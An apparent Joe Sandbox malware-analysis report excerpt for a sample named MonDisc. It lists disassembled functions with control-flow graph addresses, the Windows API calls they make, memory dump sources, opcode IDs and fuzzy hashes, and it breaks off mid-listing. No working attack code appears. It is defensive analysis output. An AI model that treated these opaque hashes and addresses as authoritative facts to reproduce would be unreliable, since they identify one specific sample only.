                              • Instruction Fuzzy Hash: 42725E62D2C9074AFF555B34AC6A2B92AD57F25370FA4463AD80ED3297DF3CB1498203
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F8EB4 Relevance: 68.3, APIs: 45, Instructions: 790windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1399 7ff62c8f8eb4-7ff62c8f8ecd GetMessageExtraInfo call 7ff62c984484 1404 7ff62c8f8ecf-7ff62c8f8ed4 1399->1404 1405 7ff62c8f8ed6-7ff62c8f8ed8 1399->1405 1404->1405 1406 7ff62c8f8f2f-7ff62c8f8f45 call 7ff62c984484 1405->1406 1407 7ff62c8f8eda 1405->1407 1415 7ff62c8f8fc5 1406->1415 1416 7ff62c8f8f47-7ff62c8f8f4f call 7ff62c984484 1406->1416 1409 7ff62c8f8edd 1407->1409 1411 7ff62c8f8ee0-7ff62c8f8ef6 GetLargePageMinimum 1409->1411 1411->1411 1412 7ff62c8f8ef8-7ff62c8f8f09 1411->1412 1412->1409 1414 7ff62c8f8f0b-7ff62c8f8f19 call 7ff62c984484 1412->1414 1423 7ff62c8f8f22-7ff62c8f8f2a 1414->1423 1424 7ff62c8f8f1b-7ff62c8f8f20 1414->1424 1419 7ff62c8f8fc8-7ff62c8f8fd0 call 7ff62c984484 1415->1419 1425 7ff62c8f8f51-7ff62c8f8f56 1416->1425 1426 7ff62c8f8f58-7ff62c8f8f76 call 7ff62c984484 1416->1426 1430 7ff62c8f8fd2-7ff62c8f8fd7 1419->1430 1431 7ff62c8f8fd9-7ff62c8f8fdc 1419->1431 1428 7ff62c8f8fbf 1423->1428 1424->1423 1425->1426 1439 7ff62c8f8f7f-7ff62c8f8fae call 7ff62c984484 1426->1439 1440 7ff62c8f8f78-7ff62c8f8f7d 1426->1440 1428->1415 1430->1431 1433 7ff62c8f8fde-7ff62c8f8fe6 call 7ff62c984484 1431->1433 1434 7ff62c8f8ffd-7ff62c8f900e 1431->1434 1443 7ff62c8f8fef-7ff62c8f8ff7 1433->1443 1444 7ff62c8f8fe8-7ff62c8f8fed 1433->1444 1434->1419 1435 7ff62c8f9010-7ff62c8f9020 GetParent IsIconic 1434->1435 1438 7ff62c8f9023-7ff62c8f902b call 7ff62c984484 1435->1438 1449 7ff62c8f9034-7ff62c8f903c call 7ff62c984484 1438->1449 1450 7ff62c8f902d-7ff62c8f9032 1438->1450 1451 7ff62c8f8fb0-7ff62c8f8fb5 1439->1451 1452 7ff62c8f8fb7-7ff62c8f8fbc 1439->1452 1440->1439 1443->1434 1444->1443 1455 7ff62c8f9045-7ff62c8f9063 1449->1455 1456 7ff62c8f903e-7ff62c8f9043 1449->1456 1450->1449 1451->1452 1452->1428 1455->1438 1457 7ff62c8f9065-7ff62c8f906b GetMessageExtraInfo 1455->1457 1456->1455 1458 7ff62c8f906d-7ff62c8f907b 1457->1458 1458->1458 1459 7ff62c8f907d 1458->1459 1460 7ff62c8f9080-7ff62c8f9095 call 7ff62c984484 1459->1460 1463 7ff62c8f909e-7ff62c8f90ae 1460->1463 1464 7ff62c8f9097-7ff62c8f909c 1460->1464 1465 7ff62c8f90b0-7ff62c8f90b4 1463->1465 1466 7ff62c8f90b6-7ff62c8f90b8 GetWindowTextLengthW 1463->1466 1464->1463 1465->1460 1465->1466 1467 7ff62c8f90be-7ff62c8f90cf 1466->1467 1467->1467 1468 7ff62c8f90d1-7ff62c8f90df call 7ff62c984484 1467->1468 1471 7ff62c8f90e1-7ff62c8f90e6 1468->1471 1472 7ff62c8f90e8-7ff62c8f90eb 1468->1472 1471->1472 1473 7ff62c8f910e-7ff62c8f9116 GetLastActivePopup 1472->1473 1474 7ff62c8f90ed-7ff62c8f90f5 call 7ff62c984484 1472->1474 1475 7ff62c8f9120-7ff62c8f9128 1473->1475 1479 7ff62c8f90fe-7ff62c8f910c 1474->1479 1480 7ff62c8f90f7-7ff62c8f90fc 1474->1480 1477 7ff62c8f912b-7ff62c8f9140 call 7ff62c984484 1475->1477 1483 7ff62c8f9142-7ff62c8f9147 1477->1483 1484 7ff62c8f9149-7ff62c8f9155 1477->1484 1479->1475 1480->1479 1483->1484 1485 7ff62c8f915f-7ff62c8f9165 AnyPopup 1484->1485 1486 7ff62c8f9157 1484->1486 1488 7ff62c8f9167-7ff62c8f9175 1485->1488 1486->1485 1487 7ff62c8f9159-7ff62c8f915d 1486->1487 1487->1477 1487->1485 1488->1488 1489 7ff62c8f9177 1488->1489 1490 7ff62c8f917a-7ff62c8f918f call 7ff62c984484 1489->1490 1493 7ff62c8f9191-7ff62c8f9196 1490->1493 1494 7ff62c8f9198-7ff62c8f919b 1490->1494 1493->1494 1495 7ff62c8f91a3-7ff62c8f91da GetWindowTextLengthW GetUserDefaultLangID call 7ff62c904f70 1494->1495 1496 7ff62c8f919d-7ff62c8f91a1 1494->1496 1499 7ff62c8f91e0-7ff62c8f91ec call 7ff62c8fce80 1495->1499 1500 7ff62c8fa5f6-7ff62c8fa615 call 7ff62c8fb610 1495->1500 1496->1490 1496->1495 1505 7ff62c8f91f1-7ff62c8f91ff 1499->1505 1505->1505 1506 7ff62c8f9201-7ff62c8f93f5 GetForegroundWindow call 7ff62c984484 GetDoubleClickTime call 7ff62c984484 * 3 GetUserDefaultLangID call 7ff62c984484 * 2 GetLargePageMinimum call 7ff62c984484 GetModuleHandleW 1505->1506 1536 7ff62c8f93f7-7ff62c8f9405 1506->1536 1536->1536 1537 7ff62c8f9407-7ff62c8f9418 1536->1537 1537->1537 1538 7ff62c8f941a 1537->1538 1539 7ff62c8f941d-7ff62c8f9436 IsZoomed 1538->1539 1539->1539 1540 7ff62c8f9438 1539->1540 1541 7ff62c8f943a-7ff62c8f9448 1540->1541 1541->1541 1542 7ff62c8f944a-7ff62c8f96ba call 7ff62c984484 * 4 GetWindowTextLengthW call 7ff62c984484 GetDesktopWindow GetTopWindow GetCommandLineW GetTopWindow GetMessageTime call 7ff62c984484 * 2 GetSystemDefaultLangID call 7ff62c984484 * 2 1541->1542 1576 7ff62c8f96bc-7ff62c8f96ca 1542->1576 1576->1576 1577 7ff62c8f96cc-7ff62c8f96e7 call 7ff62c984484 1576->1577 1581 7ff62c8f9712-7ff62c8f9736 AnyPopup call 7ff62c984484 1577->1581 1582 7ff62c8f9779-7ff62c8f979c call 7ff62c984484 1577->1582 1581->1582 1589 7ff62c8f980f-7ff62c8f9877 call 7ff62c984484 * 2 1581->1589 1582->1581 1582->1589 1598 7ff62c8f9879-7ff62c8f9887 1589->1598 1598->1598 1599 7ff62c8f9889-7ff62c8f9a82 call 7ff62c984484 * 6 GetCurrentProcessId GetUserDefaultLangID GetSystemDefaultLangID call 7ff62c984484 * 2 GetTopWindow 1598->1599 1631 7ff62c8f9a85-7ff62c8f9a9c GetSystemDefaultLangID 1599->1631 1631->1631 1632 7ff62c8f9a9e-7ff62c8f9c00 call 7ff62c984484 * 3 1631->1632 1645 7ff62c8f9c05-7ff62c8f9c13 1632->1645 1645->1645 1646 7ff62c8f9c15 1645->1646 1647 7ff62c8f9c17 1646->1647 1648 7ff62c8f9c19-7ff62c8f9c27 1647->1648 1648->1648 1649 7ff62c8f9c29-7ff62c8f9c37 1648->1649 1649->1647 1650 7ff62c8f9c39 1649->1650 1651 7ff62c8f9c3b-7ff62c8f9c53 1650->1651 1651->1651 1652 7ff62c8f9c55-7ff62c8f9c6c GetMessageTime GetMessageExtraInfo IsZoomed 1651->1652 1653 7ff62c8f9c71-7ff62c8f9cbb call 7ff62c984484 * 2 1652->1653 1661 7ff62c8f9cbd-7ff62c8f9cfd GetForegroundWindow GetDoubleClickTime GetUserDefaultLangID call 7ff62c984484 1653->1661 1666 7ff62c8f9d00-7ff62c8f9d5e call 7ff62c984484 GetLargePageMinimum 1661->1666 1671 7ff62c8f9d60-7ff62c8f9fef GetShellWindow call 7ff62c984484 * 7 GetCurrentProcessId call 7ff62c984484 GetCommandLineW GetModuleHandleW call 7ff62c984484 GetCommandLineW call 7ff62c984484 * 2 1666->1671 1713 7ff62c8f9ff4 1671->1713 1714 7ff62c8f9ff7-7ff62c8fa005 1713->1714 1714->1714 1715 7ff62c8fa007-7ff62c8fa015 1714->1715 1715->1713 1716 7ff62c8fa017-7ff62c8fa069 call 7ff62c984484 call 7ff62c8fdc20 call 7ff62c8fe2b0 1715->1716 1724 7ff62c8fa06e 1716->1724 1725 7ff62c8fa070-7ff62c8fa07e 1724->1725 1725->1725 1726 7ff62c8fa080-7ff62c8fa091 1725->1726 1726->1724 1727 7ff62c8fa093-7ff62c8fa172 call 7ff62c984484 * 4 1726->1727 1743 7ff62c8fa174-7ff62c8fa182 1727->1743 1743->1743 1744 7ff62c8fa184 1743->1744 1745 7ff62c8fa186-7ff62c8fa19a 1744->1745 1745->1745 1746 7ff62c8fa19c-7ff62c8fa1cb call 7ff62c984484 GetCommandLineW 1745->1746 1751 7ff62c8fa1d0-7ff62c8fa1de 1746->1751 1751->1751 1752 7ff62c8fa1e0-7ff62c8fa33a call 7ff62c984484 GetCurrentProcessId GetLargePageMinimum GetMessageExtraInfo call 7ff62c984484 * 2 GetWindowTextLengthW call 7ff62c984484 * 2 1751->1752 1752->1500
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window$ExtraInfoLengthMessageText$DefaultForegroundIconicLangLargeMinimumPageParentPopupUser
                              • String ID:
                              • API String ID: 2764942508-0
                              • Opcode ID: ebf465c328883eba75dfd2c0a98478ad7369ff7afb75a212376519344fbb4255
                              • Instruction ID: bd92dc210b8b7842c86711e3d694decafa4df4de14a90d28e3987d5445ac83f2
                              • Opcode Fuzzy Hash: ebf465c328883eba75dfd2c0a98478ad7369ff7afb75a212376519344fbb4255
                              • Instruction Fuzzy Hash: 0C623E62D2C9164AFF516B34AC652B92AD57F253B0F94863AD80DD22A7EF3CB085C503
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F5101 Relevance: 65.1, APIs: 43, Instructions: 623COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1770 7ff62c8f5101-7ff62c8f521a call 7ff62c984484 GetMessageTime 1778 7ff62c8f521c-7ff62c8f522b 1770->1778 1778->1778 1779 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 1778->1779 1784 7ff62c8f526a-7ff62c8f5279 1779->1784 1784->1784 1785 7ff62c8f527b-7ff62c8f5285 1784->1785 1786 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 1785->1786 1793 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 1786->1793 1796 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 1793->1796 1796->1796 1797 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 1796->1797 1802 7ff62c8f5364-7ff62c8f5373 1797->1802 1802->1802 1803 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 1802->1803 1809 7ff62c8f53af 1803->1809 1810 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 1809->1810 1815 7ff62c8f5401-7ff62c8f5418 1810->1815 1815->1809 1816 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 1815->1816 1817 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 1816->1817 1821 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 1817->1821 1822 7ff62c8f544c-7ff62c8f544f 1817->1822 1827 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 1821->1827 1822->1817 1822->1821 1827->1827 1828 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 1827->1828 1850 7ff62c8f55d1-7ff62c8f55e0 1828->1850 1850->1850 1851 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 1850->1851 1855 7ff62c8f5603-7ff62c8f561a GetTopWindow 1851->1855 1855->1855 1856 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 1855->1856 1873 7ff62c8f75dd-7ff62c8f75eb 1856->1873 1873->1873 1874 7ff62c8f75ed-7ff62c8f75fc 1873->1874 1875 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 1874->1875 1879 7ff62c8f75fe-7ff62c8f7602 1875->1879 1880 7ff62c8f762e-7ff62c8f7630 1875->1880 1879->1875 1879->1880 1881 7ff62c8f7635 1880->1881 1882 7ff62c8f7637-7ff62c8f7645 1881->1882 1882->1882 1883 7ff62c8f7647-7ff62c8f7655 1882->1883 1883->1881 1884 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 1883->1884 1892 7ff62c8f76a7-7ff62c8f76b5 1884->1892 1892->1892 1893 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 1892->1893 1894 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 1893->1894 1898 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 1894->1898 1899 7ff62c8f76c8-7ff62c8f76cc 1894->1899 1912 7ff62c8f77f5-7ff62c8f7803 1898->1912 1899->1894 1899->1898 1912->1912 1913 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 1912->1913 1914 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 1913->1914 1919 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 1914->1919 1929 7ff62c8f7975-7ff62c8f7983 1919->1929 1929->1929 1930 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 1929->1930 1954 7ff62c8f7c3c-7ff62c8f7c48 1930->1954 1955 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 1954->1955 1956 7ff62c8f7ba9-7ff62c8f7bad 1954->1956 1957 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 1955->1957 1956->1954 1956->1955 1957->1957 1958 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 1957->1958 1959 7ff62c8f7c9c-7ff62c8f7caa 1958->1959 1959->1959 1960 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 1959->1960 1966 7ff62c8f7cf9-7ff62c8f7d07 1960->1966 1966->1966 1967 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 1966->1967 2000 7ff62c8f7ecf-7ff62c8f7edd 1967->2000 2000->2000 2001 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 2000->2001 2009 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 2001->2009 2010 7ff62c8f8029-7ff62c8f8031 2001->2010 2009->2010 2018 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 2009->2018 2015 7ff62c8f8033-7ff62c8f8041 2010->2015 2015->2015 2017 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 2015->2017 2017->2009 2017->2018 2045 7ff62c8f81b9 2018->2045 2045->2045
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07eb7d11d4295bc528075bb4d4565afe5d1d99db761832c83f715944b95826d0
                              • Instruction ID: bddc54d9a925b88dfb70d14a41d7d9557462e42e08ee6024d555c6ac19cfea86
                              • Opcode Fuzzy Hash: 07eb7d11d4295bc528075bb4d4565afe5d1d99db761832c83f715944b95826d0
                              • Instruction Fuzzy Hash: 32427162D1C9474EFF516B34AC262B92AD57F267B0FA4463AD80DD7293EF2CB0458213
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F56BC Relevance: 56.7, APIs: 31, Strings: 1, Instructions: 656windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window$Popup$CommandCountExtraInfoLineMessageShellTick$CurrentForegroundHandleLengthModuleProcessTextZoomed$ActiveIconicLast
                              • String ID: arg
                              • API String ID: 2041650259-2022414218
                              • Opcode ID: a090476f7653a4f20d9f7cb68fa832dfc61f8030dfde6aa4fefa4dc614a2e054
                              • Instruction ID: 576b1569fccb6fc0b2d11123588c656783922bfd67bbe2e8611d73cf5387dc0f
                              • Opcode Fuzzy Hash: a090476f7653a4f20d9f7cb68fa832dfc61f8030dfde6aa4fefa4dc614a2e054
                              • Instruction Fuzzy Hash: 6432C362E289174AFF146B34AC291B92AD47F257B1F94463AD90EC22D7EF3CF1458243
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F82A9 Relevance: 54.8, APIs: 36, Instructions: 850COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Parent
                              • String ID:
                              • API String ID: 975332729-0
                              • Opcode ID: 5abf0f698b70b8af441bf28a934e024baafb8f7a8809d033692b1be2efeb7010
                              • Instruction ID: 32ad1f17b85f2d0905f1b810eb765aa32ea88ef0f19ffe0af850b0224aa11550
                              • Opcode Fuzzy Hash: 5abf0f698b70b8af441bf28a934e024baafb8f7a8809d033692b1be2efeb7010
                              • Instruction Fuzzy Hash: C3625CA7E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F8202 Relevance: 54.8, APIs: 36, Instructions: 813COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: CurrentProcess
                              • String ID:
                              • API String ID: 2050909247-0
                              • Opcode ID: d8565618b221d0dbace0c3f3fd3bff6ef2fe4a319c6a6cbf516c01d990431181
                              • Instruction ID: eab47c52af4be9f17a0de86fde66c6969f9aad7bfd076be5387e33f66c717e40
                              • Opcode Fuzzy Hash: d8565618b221d0dbace0c3f3fd3bff6ef2fe4a319c6a6cbf516c01d990431181
                              • Instruction Fuzzy Hash: 3A625FA2D289174EFF456F34AC662B929D47F263B4FA4463AD819D32D7EF2CB0458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F825C Relevance: 53.4, APIs: 35, Instructions: 856COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window
                              • String ID:
                              • API String ID: 2353593579-0
                              • Opcode ID: 7b475249e44056b32032913138981995d7b1b0ce169ccba9ed2285b008a1ba8d
                              • Instruction ID: 6dcbdcdff8d4f216c09dac04d7a1f590a311eb00f3ec093ac9ad22f8fd447030
                              • Opcode Fuzzy Hash: 7b475249e44056b32032913138981995d7b1b0ce169ccba9ed2285b008a1ba8d
                              • Instruction Fuzzy Hash: 50624D97E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F82C7 Relevance: 53.3, APIs: 35, Instructions: 845COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window
                              • String ID:
                              • API String ID: 2353593579-0
                              • Opcode ID: 2c91cb14d26e3cbfeb0a6b6d52593c8416ea1c1e338f76a07c1c61ea44a7b0ab
                              • Instruction ID: cb856b98549ed4dd4c1da389ce0344cee3cd597b9ef042c0815b9eb7b865d8c1
                              • Opcode Fuzzy Hash: 2c91cb14d26e3cbfeb0a6b6d52593c8416ea1c1e338f76a07c1c61ea44a7b0ab
                              • Instruction Fuzzy Hash: 38625DA3E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F832A Relevance: 53.3, APIs: 35, Instructions: 831windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
